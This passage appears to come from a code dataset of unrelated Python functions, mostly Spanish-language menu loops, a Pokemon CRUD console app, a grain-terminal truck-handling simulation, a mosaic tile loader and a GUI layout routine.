ejecutar_validar_bloque(blockchain)\n elif opcion_seleccionada == 7:\n ejecutar_dar_transacciones_entre(blockchain)\n elif opcion_seleccionada == 8:\n ejecutar_dar_transferencia_mayor_valor(blockchain)\n elif opcion_seleccionada == 9:\n ejecutar_calcular_saldo_cuenta(blockchain)\n elif opcion_seleccionada == 10:\n continuar = False\n else:\n print(\"Por favor seleccione una opción válida.\")", "def main():\n\tmain_menu_title = txt_sns + \"\\nBIENVENIDO AL SANSANITO POKEMON. QUE DESEA HACER?\\n\"\n\t# Opciones de menu principal\n\tmain_menu_items = [\"Crear un registro (create)\", \"Ingresar un pokemon\", \"Buscar en tabla (read)\", \"Opciones especiales de busqueda\",\\\n\t\t\t\t\t\t\"Cambiar datos de pokemon ingresado (update)\", \"Borrar registro (delete)\",\\\n\t\t\t\t\t\t\"Ver la tabla Poyo\", \"Ver la tabla Sansanito Pokemon\", \"Capacidad actual\", \"Salir\"]\n\tmain_menu_cursor = \"> \"\n\tmain_menu_cursor_style = (\"fg_red\", \"bold\")\n\tmain_menu_style = (\"bg_purple\", \"fg_yellow\")\n\tmain_menu_exit = False\n\n\tmain_menu = TerminalMenu(menu_entries=main_menu_items,\n\t\t\t\t\t\t\t title=main_menu_title,\n\t\t\t\t\t\t\t menu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\n\twhile not main_menu_exit:\n\t\tmain_sel = main_menu.show()\n\t\tsubmenu_flag = True\n\t\t# Create de CRUD y Ingresar pokemon\n\t\tif main_sel == 0 or main_sel == 1:\n\t\t\tsubmenu_flag = False\n\t\t\tprint(\"TABLA ORIGINAL:\")\n\t\t\tprint_sansanito()\n\t\t\tcreate()\n\t\t\tprint(\"\\nTABLA FINAL:\")\n\t\t\tprint_sansanito()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\tcondicion = input()\n\n\t\telif main_sel == 2:\n\t\t\tmenu1_title = \"BUSQUEDA DE REGISTRO EN SANSANITO POKEMON\\n\"\n\t\t\tmenu1_items = [\"Buscar por ID\", \"Salir\"]\n\t\t\tmenu1 = TerminalMenu(menu_entries=menu1_items,\n\t\t\t\t\t\t\t title=menu1_title,\n\t\t\t\t\t\t\t menu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\t\t\twhile submenu_flag:\n\t\t\t\tmenu1_sel = menu1.show()\n\t\t\t\tif menu1_sel == 0:\n\t\t\t\t\tread()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\telif menu1_sel == 1:\n\t\t\t\t\tsubmenu_flag = False \n\n\t\telif main_sel == 3:\n\t\t\tmenu2_title = \"BUSQUEDA ESPECIAL EN SANSANITO POKEMON. 
ELIJA UNA OPCION.\n\"\n\t\t\tmenu2_items = [\"10 pokemon con mayor prioridad\", \"10 pokemon con menor prioridad\",\\\n\t\t\t\"Pokemon con estado especifico\", \"Pokemon legendarios ingresados\",\\\n\t\t\t\"Pokemon que lleva mas tiempo ingresado\", \"Pokemon mas repetido\",\\\n\t\t\t\"Pokemon ingresados, ordenados por su prioridad\", \"Salir\"]\n\t\t\tmenu2 = TerminalMenu(menu_entries=menu2_items,\n\t\t\t\t\t\t\t\ttitle=menu2_title,\n\t\t\t\t\t\t\t\tmenu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t\tmenu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t\tmenu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t\tcycle_cursor=True,\n\t\t\t\t\t\t\t\tclear_screen=True)\n\t\t\twhile submenu_flag:\n\t\t\t\tmenu2_sel = menu2.show()\n\t\t\t\t# 10 con mayor prioridad\n\t\t\t\tif menu2_sel == 0:\n\t\t\t\t\tmaxprio_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# 10 con menor prioridad\n\t\t\t\telif menu2_sel == 1:\n\t\t\t\t\tminprio_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Filtrado por estado\n\t\t\t\telif menu2_sel == 2:\n\t\t\t\t\tprint(\"NOTA: Estados disponibles son: Envenenado, Paralizado, Quemado, Dormido, Congelado\")\n\t\t\t\t\tprint(\"Para ver pokemons sin estado, ingrese X.\\n\")\n\t\t\t\t\testado = input(\"Ingrese un estado para filtrar los datos: \")\n\t\t\t\t\tif estado.upper() == \"X\":\n\t\t\t\t\t\testado = None\n\t\t\t\t\testado_sansanito(estado)\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Los legendarios ingresados\n\t\t\t\telif menu2_sel == 3:\n\t\t\t\t\tlegendarios_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# El mas antiguo\n\t\t\t\telif menu2_sel == 4:\n\t\t\t\t\tantiguedad_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Pokemon mas repetido\n\t\t\t\telif menu2_sel == 5:\n\t\t\t\t\trepetido_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Ordenados por prioridad\n\t\t\t\telif menu2_sel == 6:\n\t\t\t\t\torden = input(\"Ingrese 1 si desea el orden DESCENDIENTE, 0 en caso contrario: \")\n\t\t\t\t\tif orden != \"1\" and orden != \"0\":\n\t\t\t\t\t\tprint(\"Input invalido! 
Intente de nuevo.\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tif orden == \"1\":\n\t\t\t\t\t\t\tordenado_sansanito(\"DESC\")\n\t\t\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tordenado_sansanito(\"ASC\")\n\t\t\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\telif menu2_sel == 7:\n\t\t\t\t\tsubmenu_flag = False\n\t\telif main_sel == 4:\n\t\t\tupdate()\n\t\t# Delete de CRUD\n\t\telif main_sel == 5:\n\t\t\ta_borrar = int(input(\"Ingrese el ID de registro a borrar: \"))\n\t\t\tdelete(a_borrar)\n\t\t\ttime.sleep(1)\n\t\t# Muestra la tabla de poyo\n\t\telif main_sel == 6:\n\t\t\tprint_poyo()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion.upper() != \"X\"):\n\t\t\t\tcondicion = input()\n\t\t# Muestra la tabla de sansanito\n\t\telif main_sel == 7:\n\t\t\tprint_sansanito()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion.upper() != \"X\"):\n\t\t\t\tcondicion = input()\n\t\t# Funcion extra que muestra la ocupacion actual de sansanito\n\t\telif main_sel == 8:\n\t\t\tprint(\"La capacidad actual es: {}/50\".format(calcular_ocupacion()))\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\tcondicion = input()\n\t\t# Salir\n\t\telif main_sel == 9:\n\t\t\tmain_menu_exit = True", "def cargaAutoStr(pila):\n while not pila_llena(pila):\n largo = random.randint(1, 15)\n apilar(pila, randString(largo))", "def menu():\n menu = int(input(\"1 para carga TLK \\n 2 Para carga zbx \\n 3 para ambos \\n\"))\n if menu == 1:\n orquestador_tlk()\n elif menu == 2:\n orquestador_zbx()\n elif menu == 3:\n orquestador_tlk()\n orquestador_zbx()", "def manipular_granos(self, camion):\r\n operaciones = self.operaciones[\"Operaciones manipuleo\"]\r\n operaciones_complementarias = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n # Manipuleo de camion por cargar\r\n if camion.tipo == \"Carga\":\r\n\r\n # Manipuleo de carga a granel seca en almacenes propios\r\n if camion.carga in [\"Harina de Soya - Hi Pro/Pellet de Soya\"]:\r\n\r\n # Si la cola de la tolva es aceptable, o si la cola de la pala mecanica y de las cuadrillas\r\n # son muy largas, o si no se dispone producto en almacen 1, entonces, se trata de cargar a\r\n # partir de un transbordo en sistema mecanizado\r\n if len(self.recursos_atencion[\"Estacion Tolva/Balanza 3\"].cola) <= 10 \\\r\n or (len(operaciones[\"Carga con pala mecanica\"].recurso.cola) > 10 and\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8) \\\r\n or not camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n transbordo = operaciones[\"Transbordo en sistema mecanizado (C)\"]\r\n ejecucion_transbordo = yield self.process(\r\n transbordo.ejecutar(self, camion, 30, self.medios_almacenamiento[\"Tolva\"]))\r\n\r\n # Si no se ejecuta el transbordo, se trata de cargar el camion tomando otras alternativoas\r\n # bajo un orden de prioridad definida a continuación\r\n if ejecucion_transbordo in [\"No ejecutada por recurso\", \"No ejecutada por producto\"]:\r\n\r\n # Si la cola de la pala 
mecanica es aceptable o la cola de las cuadrillas es muy larga,\r\n # y se dispone producto en almacenes, entonces, se carga con pala mecanica\r\n if (len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8) \\\r\n and camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # En otro caso, si la cola de las cuadrillas es aceptable y se dipone producto en almacenes,\r\n # entonces, se transborda o carga a pulso\r\n elif len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8 \\\r\n and camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 0))\r\n\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # En otro caso, si al menos se dispone producto en almacenes, entonces,\r\n # se carga con tolva desde almacen.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n carga = operaciones[\"Carga con tolva\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En otro caso, si la cola de la pala mecánica es aceptable o la cola de las cuadrillas es muy larga,\r\n # entonces, se carga con pala mecanica.\r\n elif len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8:\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"].ejecutar(self, camion))\r\n\r\n # En otro caso, si la cola de cuadrillas es aceptable, entonces, se transborda o carga a pulso.\r\n elif len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # Si no hay posibilidad de que arriben camiones para transbordo, se carga a pulso\r\n if 
len(self.recursos_atencion[\"Estacion Volcadora\"].cola) > 10 \\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En caso contrario, se transborda o carga a pulso\r\n else:\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 10))\r\n\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # Manipuleo de carga a granel seca en almacenes externos\r\n elif camion.carga in [\"Grano de Soya\"]:\r\n\r\n # Si se dispone algún camion esperando por transbordo, entonces,\r\n # se interrumpe su espera y se transborda a pulso\r\n if camion.dispone_camion_esperando_camion(self):\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 0))\r\n\r\n # Si el camion espera se genera y muestra un error\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En caso contrario, si la pala mecanica tiene una cola aceptable o la cola de las cuadrillas\r\n # es muy larga, entonces, se carga con pala mecanica\r\n elif len(self.recursos_atencion[\"Pala Mecanica\"].cola) <= 10 \\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8:\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen Ext\"]))\r\n\r\n # Si la cola de la pala mecanica es muy larga y la de las cuadrillas es aceptable,\r\n # entonces, tenemos dos casos:\r\n else:\r\n\r\n # Si se dispone producto, se transborda o carga a pulso con poca paciencia\r\n if camion.dispone_producto_espacio_medios_almacenamiento(self):\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 10))\r\n\r\n # Si el camion espera se procede con un transbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))\r\n\r\n # Si no se dispone producto, se transborda o carga a pulso con mayor paciencia\r\n else:\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 30))\r\n\r\n # Si el camion espera se procede con un transbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = 
operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))\r\n\r\n # Manipuleo de camion por descargar\r\n elif camion.tipo == \"Descarga\":\r\n\r\n # Manipuleo de carga a granel en almacenes propios\r\n if camion.carga in [\"Harina de Soya - Hi Pro/Pellet de Soya\"]:\r\n\r\n # Si se dispone espacio en Tolva y, la cola de la volcadora es aceptable o la cola de cuadrillas\r\n # es muy larga, entonces, se descarga a partir de un transbordo en sistema mecanizado.\r\n if (camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Tolva\"]) or\r\n not camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"])) \\\r\n and (len(self.recursos_atencion[\"Estacion Volcadora\"].cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8):\r\n\r\n transbordo = operaciones[\"Transbordo en sistema mecanizado (D)\"]\r\n ejecucion_transbordo = yield self.process(\r\n transbordo.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Tolva\"]))\r\n\r\n # En caso que no se ejecute el transbordo segenera y muestra un error\r\n if ejecucion_transbordo in [\"No ejecutada por recurso\", \"No ejecutada por producto\"]:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En otro caso, si se dispone espacio en Almacen 1 y, la cola de la volcadora es acepetable o\r\n # la cola de cuadrillas es muy larga, entonces, se descarga con sistema mecanicado a almacen.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and (len(self.recursos_atencion[\"Estacion Volcadora\"].cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8):\r\n\r\n descarga = operaciones[\"Descarga con volcadora\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En otro caso, si se dispone producto en almacen 1 y la cola de las cuadrillas es aceptable,\r\n # entonces, se transborda o descarga a pulso.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n # Si no hay posibilidad de que arriben camiones para transbordo, se descarga a pulso\r\n if len(self.recursos_atencion[\"Estacion Tolva/Balanza 3\"].cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8 \\\r\n or not camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En caso contrario, se transborda o descarga a pulso\r\n else:\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 20))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n descarga = operaciones[\"Descarga a pulso - 
Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n descarga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n # En otro caso, si no se dispone producto en almacen 1 y la cola de las cuadrillas es aceptable,\r\n # entonces, se transborda a pulso.\r\n elif not camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\")))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # Manipuleo de carga a granel en almacenes externos\r\n elif camion.carga in [\"Grano de Soya\"]:\r\n\r\n # Si la cola de pala mecanica no es muy larga, se descarga a pulso.\r\n if len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8:\r\n\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen Ext\"]))\r\n\r\n # En otro caso, se transborda o descarga a pulso\r\n else:\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 30))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n descarga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))", "def mostrar_acerca_de():\n show_title(\"Informacion del Juego\")\n show_msg(\"\"\" ------------------------------\\n\"\"\")\n show_msg(\" - -\\n\")\n show_msg(\" - by: Valentina Diaz Arrieta -\\n\")\n show_msg(\" - -\\n\")\n show_msg(\" ------------------------------\\n\")\n raw_input(\"Enter para ir al menu principal \")\n return True", "def create():\n\tnombre = input(\"Ingrese el nombre de pokemon: \")\n\testado = input(\"Ingrese el estado. Si el pokemon no tiene estado, ingrese X: \")\n\n\tif estado.upper() == \"X\":\n\t\testado = None\n\n\tif estado not in estados_permitidos:\n\t\tprint(\"Estado de pokemon no permitido. Registro no fue insertado.\")\n\t\tprint(\"Devolviendo al menu principal...\")\n\t\treturn\n\n\thp_actual = int(input(\"Ingrese HP actual de pokemon: \"))\n\tfecha = input(\"Ingrese la fecha en formato DD/MM/YY HH24:MM (ej 06/09/20 14:20): \")\n\tinsertar_pokemon(nombre, hp_actual, estado, fecha)", "def menuPilas():\n print(\"\\nMenu:\"+\"\\n1. Insertar\\n2. Extraer\\n3. Visualizar\\n4. 
Salir\")\n while True: \n try:\n value=int(input(\"\\nIntroduzca la opcion que desea utilizar: \"))\n except:\n print(\"\\nWhoops! El valor que introdujiste no es un numero\")\n else:\n break\n return value", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def comando(accion,_):\r\n return array_comandos", "def ler_dados() -> None:\n opcoes = {\n '1': 'Visualizar pessoas cadastradas',\n '2': 'Visualizar veículos cadastrados'\n }\n\n opcao_escolhida = print_menu('VISUALIZAR DADOS', opcoes)\n\n limpa_console()\n if opcao_escolhida == '1':\n if select_todos_registros('pessoa'):\n print('='*100)\n print('Imprimindo todos os registros da tabela Pessoa:')\n print('='*100)\n print_pessoas()\n else:\n print('Não existe nenhuma pessoa cadastrada.')\n elif opcao_escolhida == '2':\n if select_todos_registros('veiculo'):\n print('='*100)\n print('Imprimindo todos os registros da tabela Veiculo:')\n print('='*100)\n print_veiculos()\n else:\n print('Não existe nenhum veículo cadastrado.')\n\n input('\\nPressione RETURN para voltar ao menu principal.')", "def PINTARPANTALLA(self):\n # Se configura la pantalla principal\n self.pantalla.title(\"Modelado de interiores\")\n self.pantalla.geometry(\"900x600\")\n\n # Se configura la pantalla del mapa interior\n self.telaMAPA.place(x=0, y=0)\n\n # Se configura la pantalla de control\n self.telaPANELDECONTROL.place(x=700, y=0)\n self.btnADDpunto.place(x=20, y=20)\n self.btnEliminarPunto.place(x=100, y=20)\n self.btnModificarPunto.place(x=20, y=60)\n self.btnLoadJSON.place(x=100, y=60)\n self.btnVerArbol.place(x=50, y=560)\n self.btnRepresetar.place(x=20, y=100)\n self.btnRepresetarPasoAPaso.place(x=20, y=140)\n self.btnConfiguracion.place(x=120, y=140)\n self.btnPlanoAlternativo.place(x=140, y=100)\n self.btnADDIMG.place(x=20, y=200)\n self.btnREMOVEIMG.place(x=120, y=200)\n # Se pintan los botones de los objetos de interior\n self.btnSilla.place(x=20, y=240)\n self.btnMesa.place(x=80, y=240)\n self.btnNevera.place(x=140, y=240)\n self.btnCama.place(x=20, y=290)\n self.btnSofa.place(x=80, y=290)\n self.btnTV.place(x=140, y=290)\n self.btnLampara.place(x=20, y=340)\n self.btnPlanta.place(x=80, y=340)\n 
